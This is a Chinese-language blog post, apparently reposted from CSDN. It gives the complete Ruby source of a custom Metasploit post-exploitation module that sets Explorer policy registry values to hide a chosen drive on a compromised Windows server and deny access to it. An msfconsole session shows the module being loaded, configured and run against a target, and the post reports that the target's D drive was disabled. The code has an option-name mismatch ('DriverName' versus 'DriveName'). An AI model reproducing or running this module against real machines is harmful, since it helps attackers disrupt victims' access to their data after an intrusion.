2. 程式人生 > >滲透之——Metasploit自定義讓磁碟失效的後滲透模組

滲透之——Metasploit自定義讓磁碟失效的後滲透模組

阿新 發佈:2019-01-14

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86383118

一個可以禁用Windows 作業系統上的指定硬碟的程式,這裡我們將指令碼命名為:disable_drives_by_binghe.rb。

具體內容如下:

##
# Author 冰河
# Date 2019-01-12
# Description 禁用Windows作業系統上的指定硬碟的程式
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  
  def initialize
    super(
        'Name'        => 'Driver Disabler',
        'Description' => 'This Modules Hides and Restrict Access to a Drive',
        'Author'      => 'binghe',
        'License'     => MSF_LICENSE
    )
    register_options(
    [
      OptString.new('DriverName', [true, 'Please SET the Drive Letter'])
    ], self.class)
    end
   
   def run
    drive_int = drive_string(datastore['DriveName'])
    key1 = "HKLM\\SoftWare\\Microsoft\\WIndows\\CurrentVersion\\Policies\\Explorer"
    exists = meterpreter_registry_key_exist?(key1)
    if not exists
      print_good("Hidden Drive") 
      meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
      print_good("Restricting Access to the Drive")
      meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD',REGISTRY_VIEW_NATIVE)
    else
      print_good("Key Exist, Skipping and Creating Values")
      print_good("Hiding Drive")
      meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
      print_good("Restricting Access to the Drive")
      meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD',REGISTRY_VIEW_NATIVE)
     end
     print_good("Disabled #{datastore['DriveName']} Drive") 
    end
    
   def drive_string(drive)
    case drive
      when 'A'
        return 1
      when 'B'
        return 2
      when 'C'
        return 4
      when 'D'
        return 8
      when 'E'
        return 16
       end
    end 
end

注意:使用此指令碼的前提是我們已經經過一系列的滲透拿到了目標Windows伺服器的System許可權。

接下來我們將指令碼傳到Kali的/usr/share/metasploit-framework/modules/post/windows/manage目錄下,此時,我們在Kali下操作:

msfconsole
msf auxiliary(scanner/ssh/ssh_brute_by_binghe) > use post/windows/manage/disable_drives_by_binghe 
msf post(windows/manage/disable_drives_by_binghe) > show options

Module options (post/windows/manage/disable_drives_by_binghe):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DriverName                   yes       Please SET the Drive Letter
   SESSION                      yes       The session to run this module on.

msf post(windows/manage/disable_drives_by_binghe) > set DriverName D
DriverName => D
msf post(windows/manage/disable_drives_by_binghe) > run

此時,檢視目標伺服器的D盤確實被成功禁用了。

 

相關推薦

滲透——Metasploit定義磁碟失效滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86383118 一個可以禁用Windows 作業系統上的指定硬碟的程式,這裡我們將指令碼命名為:disable_drives_by_binghe.rb。 具體內容如下:

滲透——Metasploit定義收集登入憑證的滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86415478 這裡,我們以攻擊Foxmail 6.5為例,將嘗試對登入憑證進行解密,然後將它儲存到資料庫。 注意:執行這個指令碼的前提是我們已經經過一系列的滲透拿下了目

滲透——Metasploit定義SSH認證暴力破解器

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86380258 這裡,我們首先編寫一個指令碼ssh_brute_by_binghe.rb,具體如下: ## # Author 冰河 # Date 2019-01-12 #

滲透——Metasploit定義FTP掃描模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86375375 這裡,我們編寫的Ruby指令碼ftp_version_by_binghe.rb如下: ## # Author 冰河 # Date 2019-01-12 #

JEPLUSAPP定義插件——JEPLUS軟件快速開發平臺

otto fff 使用 jid editor style img circle ckeditor JEPLUS之APP自定義插件 在JEPLUS中我們可以創建APP,但是創建的APP都是依賴於平臺功能在我們業務中有些需求並不是都要按照平臺

數據庫系列mysql 定義函數function,函數和存儲過程的區別

0.11 必須 def cte fec return語句 cit 新的 too mysql 自定義函數function,函數和存儲過程的區別 https://blog.csdn.net/u010365819/article/details/80470448 1.MySQL自

Log4Net 定義屬性記錄到文件中 (三)

hive days bsp 文本 處理 message homepage layout backup 即解決了將自定義屬性記錄到數據庫之後。一個新的想法冒了出來,自定義屬性同樣也能記錄到文件中嗎?答案是肯定的,因為Log4Net既然已經考慮到了數據庫記錄方式,當然也一定考慮

小程式學習旅----定義元件toast例項

components目錄下新建資料夾toast,新建component,之後修改toast.js和toast.wxml <!--components/toast/toast.wxml--> <view class='wx_toast_container' hidden="{{!

009-Ambari二次開發新增定義元件Redis(二)

上一篇我們主要介紹了Ambari新增元件的答題流程並以REDIS為例說明了流程,本篇在上一篇的基礎上,進一步完善說明流程並介紹如何給元件新增metric 掃描二維碼,關注BearData,獲取最新文章 上篇中,我們已經制作出了redis的rpm包,並重新編譯了我們修改後的Ambar

008-Ambari二次開發新增定義元件Redis(一)

Ambari目前支援的元件有HDFS、YARN、HBase、Hive、Pig、ZooKeeper、Sqoop、Storm、Flume、Tez、Oozie、Falcon、Storm、Altas、Knox、Spark、Ranger、Mahout、Kerberos等,已經涵蓋了從大資料應用的

車機開發新增定義

S700平臺即安卓5.1.1系統新增額外的自定義鍵值按鍵: 在Android的原生系統中鍵值預設情況下是92個,從0-91;一般情況下,這些鍵值是夠用的,但是如果想擴充的話,還是需要新增新的鍵值的;像我們做車機專案的,新增新按鍵鍵值太易見了,比如將倒車檢測做成新自定義鍵值按鍵,我們需要到多個

javawebEL定義函式

1.什麼是EL自定義函式 EL自定義函式是在EL表示式中呼叫的某個java類的靜態方法,這個靜態方法需在web應用程式中進行配置才可以被EL表示式呼叫。EL自定義函式可以擴充套件EL表示式的功能,讓EL表示式完成普通java程式程式碼所能完成的功能。 2.EL自定義函式開發步驟 編寫EL自定義函式

小程式填坑路--定義模態彈窗(已解決)

信我,這次只講技術! 實現效果(點選“更換手機號”,背景變暗,彈出輸入框): 嗯,我懶,就用了上一篇文章小程式填坑之路--彈窗修改手機號後的更新(已解決)的圖。 先上wxml的程式碼, <view class="weui-vcode-btn" bindtap="

一道面試題關於定義Json解析器

最近在群裡裡面有哥們說在面試的時候,要求上機寫一個簡單的Json解析器,看到這個題目的時候,心裡慌得一比,因為感覺有些力不從心,不知道從哪裡下手,所以趕緊查了一下Gson原始碼,看看有什麼啟示沒有。當然,這篇扯淡並不是介紹Gson原始碼,而是想自定義一個簡單的Json解析器,來熟悉一下J

並發編程學習筆記構建定義的同步工具(十一)

利用 追蹤 這不 temp sets nor rac lse 情況下 概述: 在並發編程學習筆記之並發工具類(四)中,為大家介紹了幾種同步工具(同步工具就是依靠自己的狀態,調節線程是阻塞還是運行用的.),閉鎖、FutureTask、信號量、關卡. 使用以上的同步工具大部分時

併發程式設計學習筆記構建定義的同步工具(十一)

概述: 在併發程式設計學習筆記之併發工具類(四)中,為大家介紹了幾種同步工具(同步工具就是依靠自己的狀態,調節執行緒是阻塞還是執行用的.),閉鎖、FutureTask、訊號量、關卡. 使用以上的同步工具大部分時候可以滿足我們的需求,但是如果沒能滿足我們需要的功能,可以使用語言和類庫提供的底層

MT5客戶端CTP接入 國內期貨定義交易品種 實時資料接收

實時接收資料大概分為2種方式 方式1:直接通過webrequest方式去請求, 例如 void OnStart() { string cookie=NULL,headers; char post[],result[]; string url="htt

MT5客戶端CTP接入 國內期貨定義交易品種 歷史資料匯入

方法1: 介面插入歷史資料 1.  選中產品與資料週期 2 選擇歷史資料檔案 將資料插入 3. 檢視匯入歷史資料情況 切換1小時週期 資料自然推算出來 good! 4.  K線效果圖   手工匯入成功

SpringBoot系列使用定義註解校驗使用者是否登入

記得今年年初剛開始面試的時候,被問的最多的就是你知道Spring的兩大核心嘛?那你說說什麼是AOP,什麼是IOC?我相信你可能也被問了很多次了。 1、到底是什麼是AOP? 所謂AOP也就是面向切面程式設計,能夠讓我們在不影響原有業務功能的前提下,橫切擴充套件新的功能。這裡面有一個比較顯眼的詞

微信小程式 動畫 —— 定義底部彈出層

wxml: <view class='buy' bindtap='showBuyModal'>立即購買</view> <!-- 點選立即購買 彈出購買遮罩層 --> <view class="cover_screen" bindtap="hideBuyModal"